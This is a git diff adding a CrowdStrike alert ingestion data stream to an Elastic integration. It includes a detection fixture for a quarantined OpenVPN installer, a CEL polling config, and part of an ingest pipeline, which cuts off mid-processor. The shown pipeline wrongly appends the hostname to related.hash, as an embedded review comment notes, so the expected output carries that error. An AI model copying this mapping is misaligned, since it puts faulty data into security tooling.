"{\"agent_id\":\"2ce412d17b334ad4adc8c1c54dbfec4b\",\"aggregate_id\":\"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"alleged_filetype\":\"exe\",\"cid\":\"92012896127c4a948236ba7601b886b0\",\"cloud_indicator\":\"false\",\"cmdline\":\"\\\"C:\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\\\"\",\"composite_id\":\"92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"confidence\":10,\"context_timestamp\":\"2023-11-03T18:00:31Z\",\"control_graph_id\":\"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778\",\"crawl_edge_ids\":{\"Sensor\":[\"KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\\\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N\",\"KZcZA__;?\\\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\\\"__\\\"59K'R?_=`'`rK/'hA\\\"r+L5i-*Ut5PI!!*'!\",\"N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\\\"%MDAR=fo41Z]rXc\\\"J-\\\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr\",\"N6CUF__;K!d$:\\\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\\\"X'\\\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\\\"<_/?I'[##WMh'H[Rcl+!!<<'\",\"N6L[G__;K!d\\\"qhT7k?[D\\\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\\\"d.&=To@9kS!prs8N\"]},\"crawl_vertex_ids\":{\"Sensor\":[\"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4\",\"mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"mod:2ce412d17b33
4ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33\",\"pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135\",\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876\",\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993\",\"quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\"]},\"crawled_timestamp\":\"2023-11-03T19:00:23.985020992Z\",\"created_timestamp\":\"2023-11-03T18:01:23.995794943Z\",\"data_domains\":[\"Endpoint\"],\"description\":\"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.\",\"device\":{\"agent_load_flags\":\"0\",\"agent_local_time\":\"2023-10-12T03:45:57.753Z\",\"agent_version\":\"7.04.17605.0\",\"bios_manufacturer\":\"ABC\",\"bios_version\":\"F8CN42WW(V2.05)\",\"cid\":\"92012896127c4a948236ba7601b886b0\",\"config_id_base\":\"65994763\",\"config_id_build\":\"17605\",\"config_id_platform\":\"3\",\"device_id\":\"2ce412d17b334ad4adc8c1c54dbfec4b\",\"external_ip\":\"81.2.69.142\",\"first_seen\":\"2023-04-07T09:36:36Z\",\"groups\":[\"18704e21288243b58e4c76266d38caaf\"],\"hostinfo\":{\"active_directory_dn_display\":[\"WinComputers\",\"WinComputers\\\\ABC\"],\"domain\":\"ABC.LOCAL\"},\"hostname\":\"ABC709-1175\",\"last_seen\":\"2023-11-03T17:51:42Z\",\"local_ip\":\"81.2.69.142\",\"mac_address\":\"ab-21-48-61-05-b2\",\"machine_domain\":\"ABC.LOCAL\",\"major_version\":\"10\",\"minor_version\":\"0\",\"modified_timestamp\":\"2023-11-03T17:53:43Z\",\"os_version\":\"Windows11\",\"ou\":[\"ABC\",\"WinComputers\"],\"platform_id\":\"0\",\"platform_name\":\"Windows\",\"pod_labels\":null,\"product_type\":\"1\",\"product_type_desc\":\"Workstation\",\"site_name\":\"Default-First-Site-Name\",\"status\":\"normal\",\"system_manufacturer\":\"LENOVO\",\"system_product_name\":\"20VE\"},\"falcon_host_link\":\"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17
b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"filename\":\"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"grandparent_details\":{\"cmdline\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\",\"filename\":\"userinit.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\userinit.exe\",\"local_process_id\":\"4328\",\"md5\":\"b07f77fd3f9828b2c9d61f8a36609741\",\"process_graph_id\":\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135\",\"process_id\":\"392734873135\",\"sha256\":\"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33\",\"timestamp\":\"2023-10-30T16:49:19Z\",\"user_graph_id\":\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"yuvraj.mahajan\"},\"has_script_or_module_ioc\":\"true\",\"id\":\"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"indicator_id\":\"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"ioc_context\":[{\"ioc_description\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"ioc_source\":\"library_load\",\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"md5\":\"cdf9cfebb400ce89d5b6032bfcdc693b\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"type\":\"module\"}],\"ioc_values\":[
],\"is_synthetic_quarantine_disposition\":true,\"local_process_id\":\"17076\",\"logon_domain\":\"ABSYS\",\"md5\":\"cdf9cfebb400ce89d5b6032bfcdc693b\",\"name\":\"PrewittPupAdwareSensorDetect-Lowest\",\"objective\":\"FalconDetectionMethod\",\"parent_details\":{\"cmdline\":\"C:\\\\WINDOWS\\\\Explorer.EXE\",\"filename\":\"explorer.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\explorer.exe\",\"local_process_id\":\"1040\",\"md5\":\"8cc3fcdd7d52d2d5221303c213e044ae\",\"process_graph_id\":\"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876\",\"process_id\":\"392736520876\",\"sha256\":\"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4\",\"timestamp\":\"2023-11-03T18:00:32Z\",\"user_graph_id\":\"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"mohit.jha\"},\"parent_process_id\":\"392736520876\",\"pattern_disposition\":2176,\"pattern_disposition_description\":\"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.\",\"pattern_disposition_details\":{\"blocking_unsupported_or_disabled\":false,\"bootup_safeguard_enabled\":false,\"critical_process_disabled\":false,\"detect\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"inddet_mask\":false,\"indicator\":false,\"kill_action_failed\":false,\"kill_parent\":false,\"kill_process\":false,\"kill_subprocess\":false,\"operation_blocked\":false,\"policy_disabled\":false,\"process_blocked\":true,\"quarantine_file\":true,\"quarantine_machine\":false,\"registry_operation_blocked\":false,\"rooting\":false,\"sensor_only\":false,\"suspend_parent\":false,\"suspend_process\":false},\"pattern_id\":5761,\"platform\":\"Windows\",\"poly_id\":\"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==\",\"process_end_time\":\"1699034421\",\"process_id\":\"399748687993\",\"process_start_time\":\"1699034413\",\"product\"
:\"epp\",\"quarantined_files\":[{\"filename\":\"\\\\Device\\\\Volume3\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\",\"id\":\"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"state\":\"quarantined\"}],\"scenario\":\"NGAV\",\"severity\":30,\"sha1\":\"0000000000000000000000000000000000000000\",\"sha256\":\"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd\",\"show_in_ui\":true,\"source_products\":[\"FalconInsight\"],\"source_vendors\":[\"CrowdStrike\"],\"status\":\"new\",\"tactic\":\"MachineLearning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Adware/PUP\",\"technique_id\":\"CST0000\",\"timestamp\":\"2023-11-03T18:00:22.328Z\",\"tree_id\":\"1931778\",\"tree_root\":\"38687993\",\"triggering_process_graph_id\":\"pid:2ce4124ad4adc8c1c54dbfec4b:399748687993\",\"type\":\"ldt\",\"updated_timestamp\":\"2023-11-03T19:00:23.985007341Z\",\"user_id\":\"S-1-5-21-1909377054-3469629671-4104191496-4425\",\"user_name\":\"mohit.jha\"}", + "severity": 30 + }, + "file": { + "name": "openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "path": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe" + }, + "host": { + "domain": "ABC.LOCAL", + "hostname": "ABC709-1175", + "ip": [ + "81.2.69.142" + ], + "mac": [ + "AB-21-48-61-05-B2" + ], + "os": { + "full": "Windows11", + "platform": "Windows" + } + }, + "message": 
"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "process": { + "end": "2023-11-03T18:00:21.000Z", + "parent": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "hash": { + "md5": "8cc3fcdd7d52d2d5221303c213e044ae", + "sha256": "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4" + }, + "pid": 392736520876 + }, + "pid": 399748687993, + "start": "2023-11-03T18:00:13.000Z", + "user": { + "id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "name": "mohit.jha" + } + }, + "related": { + "hash": [ + "ABC709-1175", + "b07f77fd3f9828b2c9d61f8a36609741", + "cdf9cfebb400ce89d5b6032bfcdc693b", + "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "8cc3fcdd7d52d2d5221303c213e044ae", + "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "0000000000000000000000000000000000000000" + ], + "hosts": [ + "ABC.LOCAL" + ], + "ip": [ + "81.2.69.142" + ], + "user": [ + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "S-1-5-21-1909377054-3469629671-4104191496-4425", + "yuvraj.mahajan", + "mohit.jha" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "tactic": { + "id": [ + "TA0004" + ], + "name": [ + "MachineLearning" + ] + }, + "technique": { + "id": [ + "T0000" + ], + "name": [ + "Adware/PUP" + ] + } + }, + "user": { + "id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "name": "mohit.jha" + } + } + ] +} \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-common-config.yml b/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..be41bb0d476 --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,4 @@ +fields: + tags: + - preserve_original_event + - preserve_duplicate_custom_fields 
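Review bot: `related.hash` in the expected document begins with the hostname `ABC709-1175` while `related.hosts` holds only the domain `ABC.LOCAL`, so as far as this fixture shows the ingest pipeline appends `host.hostname` to the hash list — presumably an `append` processor in `default.yml` whose `field` is `related.hash` where `related.hosts` was intended; the fixture should not be accepted as the expected output until that is fixed and the file regenerated. `threat.tactic.id` `TA0004` and `threat.technique.id` `T0000` are evidently derived by stripping the `CS` prefix from `CSTA0004` / `CST0000`, which are CrowdStrike's own non-ATT&CK classifications (`MachineLearning`, `Adware/PUP`); the resulting `TA0004` is the ATT&CK identifier for Privilege Escalation, so analysts filtering on ATT&CK ids would be misled. I would leave the vendor id untouched when it starts with `CS` (or only populate `threat.tactic.id` / `threat.technique.id` for values that already have the `TA`/`T` ATT&CK form) and regenerate this file. The pipeline that produces these values is outside this hunk.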
diff --git a/packages/crowdstrike/data_stream/alert/_dev/test/system/test-common-config.yml b/packages/crowdstrike/data_stream/alert/_dev/test/system/test-common-config.yml
new file mode 100644
index 00000000000..6bec1ba6b0e
--- /dev/null
+++ b/packages/crowdstrike/data_stream/alert/_dev/test/system/test-common-config.yml
@@ -0,0 +1,15 @@
+input: cel
+service: crowdstrike-alert
+vars:
+ url: http://{{Hostname}}:{{Port}}
+ client_id: xxxx
+ client_secret: xxxx
+ token_url: http://{{Hostname}}:{{Port}}/oauth2/token
+data_stream:
+ vars:
+ interval: 10s
+ batch_size: 1
+ preserve_original_event: true
+ preserve_duplicate_custom_fields: true
+assert:
+ hit_count: 2
diff --git a/packages/crowdstrike/data_stream/alert/agent/stream/cel.yml.hbs b/packages/crowdstrike/data_stream/alert/agent/stream/cel.yml.hbs
new file mode 100644
index 00000000000..8e026b01d15
--- /dev/null
+++ b/packages/crowdstrike/data_stream/alert/agent/stream/cel.yml.hbs
@@ -0,0 +1,103 @@ +config_version: 2 +interval: {{interval}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/cel/http-request-trace-*.ndjson" +request.tracer.maxbackups: 5 +{{/if}} +{{#if proxy_url}} +resource.proxy_url: {{proxy_url}} +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +resource.url: {{url}} +auth.oauth2: + client.id: {{client_id}} + client.secret: {{client_secret}} + token_url: {{token_url}} +state: + initial_interval: {{initial_interval}} + want_more: false + offset: 0 + batch_size: {{batch_size}} +redact: + fields: ~ +program: | + ( + state.with( + ( + !state.want_more ? + request("GET", state.url + "/alerts/queries/alerts/v2?sort=timestamp|asc&offset=0&limit=" + string(state.batch_size) + '&filter=timestamp:>"' + ( + has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + state.cursor.last_timestamp + '"' + : + (now - duration(state.initial_interval)).format(time_layout.RFC3339) + '"' + )) + : + request("GET", state.url + "/alerts/queries/alerts/v2?sort=timestamp|asc&offset=" + string(state.offset) + "&limit=" + string(state.batch_size) + '&filter=timestamp:>"' + ( + has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + state.cursor.first_timestamp + '"' + : + '"' + )) + ).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { + "resources": has(body.resources) && body.resources.size() > 0 ? body.resources : "", + "want_more": ((int(state.offset) + body.resources.size()) < body.meta.pagination.total), + "offset": ((int(state.offset) + body.resources.size()) < body.meta.pagination.total) ? + int(state.offset) + int(body.resources.size()) + : + 0, + "url": state.url, + "batch_size": state.batch_size, + "initial_interval": state.initial_interval, + })) + ).as(state, state.with( + !has(state.resources) || state.resources == "" ? 
{"events": []} : + post_request( + state.url + "/alerts/entities/alerts/v2", + "application/json", + {"composite_ids": state.resources}.encode_json() + ).do_request().as(resp, bytes(resp.Body).decode_json().as(inner_body, { + "events": inner_body.resources.map(e, { + "message": e.encode_json(), + }), + "cursor": { + "last_timestamp": ( + has(inner_body.resources) && inner_body.resources.size() > 0 ? + inner_body.resources.map(e, e.timestamp).max() + : has(state.cursor) && has(state.cursor.last_timestamp) ? + state.cursor.last_timestamp + : + null + ), + "first_timestamp": ( + has(state.cursor) && has(state.cursor.first_timestamp) && state.cursor.first_timestamp != null ? + (state.want_more ? state.cursor.first_timestamp : state.cursor.last_timestamp) + : + (now - duration(state.initial_interval)).format(time_layout.RFC3339) + ), + }, + })) + ) + ) + ) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/crowdstrike/data_stream/alert/elasticsearch/ingest_pipeline/default.yml b/packages/crowdstrike/data_stream/alert/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..0382ee8e697 --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/elasticsearch/ingest_pipeline/default.yml 
@@ -0,0 +1,1377 @@ +--- +description: Pipeline for processing Alert logs. +processors: + - set: + field: ecs.version + tag: set_ecs_version + value: 8.11.0 + - set: + field: event.kind + tag: set_event_kind + value: alert + - rename: + field: message + tag: rename_message_to_event_original + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + tag: json_event_original + target_field: json + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.agent_id + tag: rename_agent_id + target_field: crowdstrike.alert.agent_id + ignore_missing: true + - rename: + field: json.aggregate_id + tag: rename_aggregate_id + target_field: crowdstrike.alert.aggregate_id + ignore_missing: true + - rename: + field: json.alleged_filetype + tag: rename_alleged_filetype + target_field: crowdstrike.alert.alleged_filetype + ignore_missing: true + - rename: + field: json.cid + tag: rename_cid + target_field: crowdstrike.alert.cid + ignore_missing: true + - convert: + field: json.cloud_indicator + tag: convert_cloud_indicator_to_boolean + target_field: crowdstrike.alert.cloud_indicator + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.cmdline + tag: rename_cmdline + target_field: crowdstrike.alert.cmdline + ignore_missing: true + - rename: + field: json.composite_id + tag: rename_composite_id + target_field: crowdstrike.alert.composite_id + ignore_missing: true + - convert: + field: json.confidence + tag: convert_confidence_to_long + 
target_field: crowdstrike.alert.confidence + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.context_timestamp + tag: date_context_timestamp + target_field: crowdstrike.alert.context_timestamp + formats: + - ISO8601 + if: ctx.json?.context_timestamp != null && ctx.json.context_timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.control_graph_id + tag: rename_control_graph_id + target_field: crowdstrike.alert.control_graph_id + ignore_missing: true + - rename: + field: json.crawl_edge_ids.Sensor + tag: rename_crawl_edge_ids_Sensor + target_field: crowdstrike.alert.crawl_edge_ids.Sensor + ignore_missing: true + - rename: + field: json.crawl_vertex_ids.Sensor + tag: rename_crawl_vertex_ids_Sensor + target_field: crowdstrike.alert.crawl_vertex_ids.Sensor + ignore_missing: true + - date: + field: json.crawled_timestamp + tag: date_crawled_timestamp + target_field: crowdstrike.alert.crawled_timestamp + formats: + - ISO8601 + if: ctx.json?.crawled_timestamp != null && ctx.json.crawled_timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.created_timestamp + tag: date_created_timestamp + target_field: crowdstrike.alert.created_timestamp + formats: + - ISO8601 + if: ctx.json?.created_timestamp != null && 
ctx.json.created_timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.data_domains + tag: rename_data_domains + target_field: crowdstrike.alert.data_domains + ignore_missing: true + - rename: + field: json.description + tag: rename_description + target_field: crowdstrike.alert.description + ignore_missing: true + - set: + field: message + tag: set_message_from_alert_description + copy_from: crowdstrike.alert.description + ignore_empty_value: true + - convert: + field: json.device.agent_load_flags + tag: convert_device_agent_load_flags_to_long + target_field: crowdstrike.alert.device.agent_load_flags + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device.agent_local_time + tag: date_device_agent_local_time + target_field: crowdstrike.alert.device.agent_local_time + formats: + - ISO8601 + if: ctx.json?.device?.agent_local_time != null && ctx.json.device.agent_local_time != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device.agent_version + tag: rename_device_agent_version + target_field: crowdstrike.alert.device.agent_version + ignore_missing: true + - rename: + field: json.device.bios_manufacturer + tag: rename_device_bios_manufacturer + target_field: crowdstrike.alert.device.bios_manufacturer + ignore_missing: true + - 
rename: + field: json.device.bios_version + tag: rename_device_bios_version + target_field: crowdstrike.alert.device.bios_version + ignore_missing: true + - rename: + field: json.device.cid + tag: rename_device_cid + target_field: crowdstrike.alert.device.cid + ignore_missing: true + - rename: + field: json.device.config_id_base + tag: rename_device_config_id_base + target_field: crowdstrike.alert.device.config_id_base + ignore_missing: true + - rename: + field: json.device.config_id_build + tag: rename_device_config_id_build + target_field: crowdstrike.alert.device.config_id_build + ignore_missing: true + - convert: + field: json.device.config_id_platform + tag: convert_device_config_id_platform_to_long + target_field: crowdstrike.alert.device.config_id_platform + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.device.external_ip + tag: convert_device_external_ip_to_ip + target_field: crowdstrike.alert.device.external_ip + type: ip + ignore_missing: true + if: ctx.json?.device?.external_ip != null && ctx.json.device.external_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: append_crowdstrike_alert_device_external_ip_into_related_ip + value: '{{{crowdstrike.alert.device.external_ip}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.device?.external_ip != null + - append: + field: host.ip + tag: append_crowdstrike_alert_device_external_ip_into_host_ip + value: '{{{crowdstrike.alert.device.external_ip}}}' + allow_duplicates: false + if: 
ctx.crowdstrike?.alert?.device?.external_ip != null + - date: + field: json.device.first_seen + tag: date_device_first_seen + target_field: crowdstrike.alert.device.first_seen + formats: + - ISO8601 + if: ctx.json?.device?.first_seen != null && ctx.json.device.first_seen != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device.groups + tag: rename_device_groups + target_field: crowdstrike.alert.device.groups + ignore_missing: true + - rename: + field: json.device.hostinfo.active_directory_dn_display + tag: rename_device_hostinfo_active_directory_dn_display + target_field: crowdstrike.alert.device.hostinfo.active_directory_dn_display + ignore_missing: true + - rename: + field: json.device.hostinfo.domain + tag: rename_device_hostinfo_domain + target_field: crowdstrike.alert.device.hostinfo.domain + ignore_missing: true + - set: + field: host.domain + tag: set_host_domain_from_alert_device_hostinfo_domain + copy_from: crowdstrike.alert.device.hostinfo.domain + ignore_empty_value: true + - append: + field: related.hosts + value: '{{{host.domain}}}' + allow_duplicates: false + if: ctx.host?.domain != null + - rename: + field: json.device.hostname + tag: rename_device_hostname + target_field: crowdstrike.alert.device.hostname + ignore_missing: true + - set: + field: host.hostname + tag: set_host_hostname_from_alert_device_hostname + copy_from: crowdstrike.alert.device.hostname + ignore_empty_value: true + - append: + field: related.hash + value: '{{{host.hostname}}}' + allow_duplicates: false + if: ctx.host?.hostname != null + - rename: + field: json.device.device_id + tag: rename_device_device_id + target_field: crowdstrike.alert.device.id + ignore_missing: true + - set: + field: device.id + tag: set_device_id_from_alert_device_id + 
copy_from: crowdstrike.alert.device.id + ignore_empty_value: true + - date: + field: json.device.last_seen + tag: date_device_last_seen + target_field: crowdstrike.alert.device.last_seen + formats: + - ISO8601 + if: ctx.json?.device?.last_seen != null && ctx.json.device.last_seen != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.device.local_ip + tag: convert_device_local_ip_to_ip + target_field: crowdstrike.alert.device.local_ip + type: ip + ignore_missing: true + if: ctx.json?.device?.local_ip != null && ctx.json.device.local_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: append_crowdstrike_alert_device_local_ip_into_related_ip + value: '{{{crowdstrike.alert.device.local_ip}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.device?.local_ip != null + - gsub: + field: json.device.mac_address + tag: gsub_device_mac_address + pattern: '[:.]' + replacement: '-' + target_field: crowdstrike.alert.device.mac_address + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - uppercase: + field: crowdstrike.alert.device.mac_address + tag: uppercase_device_mac_address + ignore_missing: true + if: ctx.crowdstrike?.alert?.device?.mac_address != '' + on_failure: + - append: + field: 